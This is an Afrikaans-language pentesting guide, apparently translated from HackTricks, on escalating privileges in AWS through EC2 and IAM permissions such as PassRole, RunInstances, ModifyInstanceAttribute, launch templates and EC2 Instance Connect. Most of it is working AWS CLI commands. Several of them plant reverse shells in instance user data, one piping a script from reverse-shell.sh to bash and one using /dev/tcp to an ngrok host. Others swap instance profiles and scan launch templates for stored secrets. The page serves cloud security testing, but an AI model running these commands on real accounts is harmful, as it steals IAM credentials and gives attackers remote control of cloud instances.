AWS - EC2 Privesc

EC2

Vir meer inligting oor EC2 kyk:

iam:PassRole, ec2:RunInstances

'n Aanvaller kan 'n instansie skep wat 'n IAM rol aanheg en dan toegang tot die instansie verkry om die IAM rol geloofsbriewe van die metadata eindpunt te steel.

• Toegang via SSH

Voer 'n nuwe instansie uit met 'n geskepte ssh sleutel (--key-name) en ssh dan daarin (as jy 'n nuwe een wil skep, mag jy die toestemming ec2:CreateKeyPair nodig hê).

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=<instance-profile-name> --key-name <ssh-key> \
--security-group-ids <sg-id>

• Toegang via rev shell in gebruikersdata

Jy kan 'n nuwe instansie gebruik deur 'n gebruikersdata (--user-data) wat vir jou 'n rev shell sal stuur. Jy hoef nie 'n sekuriteitsgroep op hierdie manier te spesifiseer nie.

echo '#!/bin/bash
curl https://reverse-shell.sh/4.tcp.ngrok.io:17031 | bash' > /tmp/rev.sh

aws ec2 run-instances --image-id <img-id> --instance-type t2.micro \
--iam-instance-profile Name=E<instance-profile-name> \
--count 1 \
--user-data "file:///tmp/rev.sh"

Wees versigtig met GuradDuty as jy die akrediteer van die IAM-rol buite die instansie gebruik:

Potensiële Impak: Direkte privesc na enige EC2-rol wat aan bestaande instansieprofiele geheg is.

Privesc na ECS

Met hierdie stel toestemmings kan jy ook 'n EC2-instansie skep en dit binne 'n ECS-kluster registreer. Op hierdie manier sal ECS dienste uitgevoer word binne die EC2-instansie waartoe jy toegang het en dan kan jy daardie dienste (docker houers) penetreer en hulle ECS-rolle wat geheg is steel.

aws ec2 run-instances \
--image-id ami-07fde2ae86109a2af \
--instance-type t2.micro \
--iam-instance-profile <ECS_role> \
--count 1 --key-name pwned \
--user-data "file:///tmp/asd.sh"

# Make sure to use an ECS optimized AMI as it has everything installed for ECS already (amzn2-ami-ecs-hvm-2.0.20210520-x86_64-ebs)
# The EC2 instance profile needs basic ECS access
# The content of the user data is:
#!/bin/bash
echo ECS_CLUSTER=<cluster-name> >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;

Om te leer hoe om ECS-dienste te dwing om in hierdie nuwe EC2-instantie te loop, kyk:

As jy nie 'n nuwe instansie kan skep nie maar die toestemming ecs:RegisterContainerInstance het, kan jy dalk die instansie binne die kluster registreer en die kommentaar aanval uitvoer.

Potensiële Impak: Direkte privesc na ECS-rolle wat aan take gekoppel is.

iam:PassRole, iam:AddRoleToInstanceProfile

Soos in die vorige scenario, kan 'n aanvaller met hierdie toestemmings die IAM-rol van 'n gecompromitteerde instansie verander sodat hy nuwe akrediteer kan steel. Aangesien 'n instansieprofiel slegs 1 rol kan hê, as die instansieprofiel reeds 'n rol het (gewone geval), sal jy ook iam:RemoveRoleFromInstanceProfile benodig.

# Removing role from instance profile
aws iam remove-role-from-instance-profile --instance-profile-name <name> --role-name <name>

# Add role to instance profile
aws iam add-role-to-instance-profile --instance-profile-name <name> --role-name <name>

As die instansieprofiel 'n rol het en die aanvaller dit nie kan verwyder nie, is daar 'n ander omweg. Hy kan vind 'n instansieprofiel sonder 'n rol of 'n nuwe een skep (iam:CreateInstanceProfile), voeg die rol by daardie instansieprofiel (soos voorheen bespreek), en koppel die instansieprofiel wat gecompromitteer is aan 'n gecompromitteerde instansie:

• As die instansie nie enige instansieprofiel het nie (ec2:AssociateIamInstanceProfile) *

aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

Potensiële Impak: Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hê).

iam:PassRole(( ec2:AssociateIamInstanceProfile& ec2:DisassociateIamInstanceProfile) || ec2:ReplaceIamInstanceProfileAssociation)

Met hierdie toestemmings is dit moontlik om die instansieprofiel wat aan 'n instansie gekoppel is, te verander, so as die aanval reeds toegang tot 'n instansie gehad het, sal hy in staat wees om akrediteer te steel vir meer instansieprofielrolle deur die een wat daarmee geassosieer is, te verander.

• As dit 'n instansieprofiel het, kan jy die instansieprofiel verwyder (ec2:DisassociateIamInstanceProfile) en dit assosieer *

aws ec2 describe-iam-instance-profile-associations --filters Name=instance-id,Values=i-0d36d47ba15d7b4da
aws ec2 disassociate-iam-instance-profile --association-id <value>
aws ec2 associate-iam-instance-profile --iam-instance-profile Name=<value> --instance-id <value>

• of vervang die instansprofiel van die gecompromitteerde instansie (ec2:ReplaceIamInstanceProfileAssociation). *

```bash
aws ec2 replace-iam-instance-profile-association --iam-instance-profile Name=<value> --association-id <value>
```

Potensiële Impak: Direkte privesc na 'n ander EC2-rol (jy moet 'n AWS EC2-instantie gekompromitteer het en 'n paar ekstra toestemmings of spesifieke instansieprofielstatus hê).

ec2:RequestSpotInstances,iam:PassRole

'n Aanvaller met die toestemmings ec2:RequestSpotInstanceseniam:PassRole kan versoek 'n Spot Instantie met 'n EC2-rol aangeheg en 'n rev shell in die gebruikersdata. Sodra die instansie gedraai word, kan hy die IAM-rol steel.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 request-spot-instances \
--instance-count 1 \
--launch-specification "{\"IamInstanceProfile\":{\"Name\":\"EC2-CloudWatch-Agent-Role\"}, \"InstanceType\": \"t2.micro\", \"UserData\":\"$REV\", \"ImageId\": \"ami-0c1bc246476a5572b\"}"

ec2:ModifyInstanceAttribute

'n Aanvaller met die ec2:ModifyInstanceAttribute kan die instansies se eienskappe verander. Onder hulle kan hy die gebruikersdata verander, wat impliseer dat hy die instansie kan arbitraire data laat loop. Dit kan gebruik word om 'n rev shell na die EC2 instansie te kry.

Let daarop dat die eienskappe slegs gewysig kan word terwyl die instansie gestop is, so die toestemmings ec2:StopInstances en ec2:StartInstances.

TEXT='Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
bash -i >& /dev/tcp/2.tcp.ngrok.io/14510 0>&1
--//'
TEXT_PATH="/tmp/text.b64.txt"

printf $TEXT | base64 > "$TEXT_PATH"

aws ec2 stop-instances --instance-ids $INSTANCE_ID

aws ec2 modify-instance-attribute \
--instance-id="$INSTANCE_ID" \
--attribute userData \
--value file://$TEXT_PATH

aws ec2 start-instances --instance-ids $INSTANCE_ID

Potensiële Impak: Direkte privesc na enige EC2 IAM Rol wat aan 'n geskepte instansie geheg is.

ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplate,ec2:ModifyLaunchTemplate

'n Aanvaller met die regte ec2:CreateLaunchTemplateVersion,ec2:CreateLaunchTemplateen ec2:ModifyLaunchTemplate kan 'n nuwe Launch Template weergawe met 'n rev shell in die gebruikersdata en enige EC2 IAM Rol daarop skep, die standaard weergawe verander, en enige Autoscaler groep wat daardie Launch Template gebruik wat gekonfigureer is om die nuutste of die standaard weergawe te gebruik, sal die instansies weer herbegin met behulp van daardie template en die rev shell uitvoer.

REV=$(printf '#!/bin/bash
curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | bash
' | base64)

aws ec2 create-launch-template-version \
--launch-template-name bad_template \
--launch-template-data "{\"ImageId\": \"ami-0c1bc246476a5572b\", \"InstanceType\": \"t3.micro\", \"IamInstanceProfile\": {\"Name\": \"ecsInstanceRole\"}, \"UserData\": \"$REV\"}"

aws ec2 modify-launch-template \
--launch-template-name bad_template \
--default-version 2

Potensiële Impak: Direkte privesc na 'n ander EC2-rol.

autoscaling:CreateLaunchConfiguration, autoscaling:CreateAutoScalingGroup, iam:PassRole

'n Aanvaller met die regte autoscaling:CreateLaunchConfiguration,autoscaling:CreateAutoScalingGroup,iam:PassRole kan 'n Launch Configuration skep met 'n IAM Rol en 'n rev shell binne die gebruikersdata, dan 'n autoscaling-groep skep vanaf daardie konfigurasie en wag vir die rev shell om die IAM Rol te steel.

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-launch-configuration \
--launch-configuration-name bad_config \
--image-id ami-0c1bc246476a5572b \
--instance-type t3.micro \
--iam-instance-profile EC2-CloudWatch-Agent-Role \
--user-data "$REV"

aws --profile "$NON_PRIV_PROFILE_USER" autoscaling create-auto-scaling-group \
--auto-scaling-group-name bad_auto \
--min-size 1 --max-size 1 \
--launch-configuration-name bad_config \
--desired-capacity 1 \
--vpc-zone-identifier "subnet-e282f9b8"

Potensiële Impak: Direkte privesc na 'n ander EC2-rol.

!autoscaling

Die stel van toestemmings ec2:CreateLaunchTemplate en autoscaling:CreateAutoScalingGroup is nie genoeg om bevoegdhede na 'n IAM-rol te verhoog nie, omdat jy om die rol wat in die Launch Configuration of in die Launch Template gespesifiseer is aan te heg jy die toestemmings iam:PassRole en ec2:RunInstances benodig (wat 'n bekende privesc is).

ec2-instance-connect:SendSSHPublicKey

'n Aanvaller met die toestemming ec2-instance-connect:SendSSHPublicKey kan 'n ssh-sleutel aan 'n gebruiker voeg en dit gebruik om toegang te verkry (as hy ssh-toegang tot die instansie het) of om bevoegdhede te verhoog.

aws ec2-instance-connect send-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--instance-os-user "ec2-user" \
--ssh-public-key "file://$PUBK_PATH"

Potensiële Impak: Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is.

ec2-instance-connect:SendSerialConsoleSSHPublicKey

'n Aanvaller met die toestemming ec2-instance-connect:SendSerialConsoleSSHPublicKey kan 'n ssh-sleutel by 'n seriële verbinding voeg. As die seriële nie geaktiveer is nie, het die aanvaller die toestemming ec2:EnableSerialConsoleAccess nodig om dit te aktiveer.

Om met die seriële poort te verbind, moet jy ook die gebruikersnaam en wagwoord van 'n gebruiker binne die masjien weet.

aws ec2 enable-serial-console-access

aws ec2-instance-connect send-serial-console-ssh-public-key \
--instance-id "$INSTANCE_ID" \
--serial-port 0 \
--region "eu-west-1" \
--ssh-public-key "file://$PUBK_PATH"

ssh -i /tmp/priv $INSTANCE_ID.port0@serial-console.ec2-instance-connect.eu-west-1.aws

Hierdie manier is nie baie nuttig vir privesc nie, aangesien jy 'n gebruikersnaam en wagwoord moet weet om dit te ontgin.

Potensiële Impak: (Hooglik onbewysbaar) Direkte privesc na die EC2 IAM rolle wat aan lopende instansies gekoppel is.

describe-launch-templates,describe-launch-template-versions

Aangesien lanseringsjablone weergawebeheer het, kan 'n aanvaller met ec2:describe-launch-templates en ec2:describe-launch-template-versions regte hierdie gebruik om sensitiewe inligting te ontdek, soos akrediteer wat in gebruikersdata teenwoordig is. Om dit te bereik, loop die volgende skrip deur al die weergawes van die beskikbare lanseringsjablone:

for i in $(aws ec2 describe-launch-templates --region us-east-1 | jq -r '.LaunchTemplates[].LaunchTemplateId')
do
echo "[*] Analyzing $i"
aws ec2 describe-launch-template-versions --launch-template-id $i --region us-east-1 | jq -r '.LaunchTemplateVersions[] | "\(.VersionNumber) \(.LaunchTemplateData.UserData)"' | while read version userdata
do
echo "VersionNumber: $version"
echo "$userdata" | base64 -d
echo
done | grep -iE "aws_|password|token|api"
done

In die bogenoemde opdragte, alhoewel ons sekere patrone spesifiseer (aws_|password|token|api), kan jy 'n ander regex gebruik om ander tipes sensitiewe inligting te soek.

As ons aws_access_key_id en aws_secret_access_key vind, kan ons hierdie akrediteer om by AWS aan te meld.

Potensiële Impak: Direkte privilige-escalasie na IAM gebruiker(s).

Verwysings

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/